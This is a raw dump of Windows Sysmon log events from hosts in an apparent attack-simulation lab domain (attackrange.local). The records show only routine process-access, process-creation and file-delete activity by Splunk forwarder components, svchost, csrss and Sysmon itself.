|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291261Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.671{BEA10069-D0C1-6086-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{BEA10069-0200-6088-F129-00000000BB01}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291260Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.671{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-0200-6088-F129-00000000BB01}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291259Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.672{BEA10069-0200-6088-F129-00000000BB01}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000291258Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.132{BEA10069-0200-6088-F029-00000000BB01}26963916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291257Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.001{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-0200-6088-F029-00000000BB01}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291256Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.001{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291255Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.001{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291254Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.001{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291253Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.001{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291252Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.001{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291251Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.001{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291250Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.001{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291249Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.001{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291248Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.001{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291247Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.001{BEA10069-D0C1-6086-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{BEA10069-0200-6088-F029-00000000BB01}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291246Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.001{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-0200-6088-F029-00000000BB01}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291245Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:24.002{BEA10069-0200-6088-F029-00000000BB01}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000291289Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.990{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F0DDDFD3997C9BF0DF9A058F8876B8D,SHA256=5C04CC3017CEAF36F1C96A320DD9C36E3794BFBBE12F28A9AAE0C87CB064F273,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439941Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:25.832{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A53F11F4F837A7B1A059550994BC0C6,SHA256=621C2C7E717300569D5FE0E6C9A6D917B0FE7421C4E26FF700C690F0F03E003D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291288Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.489{BEA10069-0201-6088-F229-00000000BB01}66365200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291287Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.357{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-0201-6088-F229-00000000BB01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291286Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.357{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291285Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.357{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291284Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.357{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291283Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.357{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291282Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.357{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291281Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.357{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291280Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.356{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 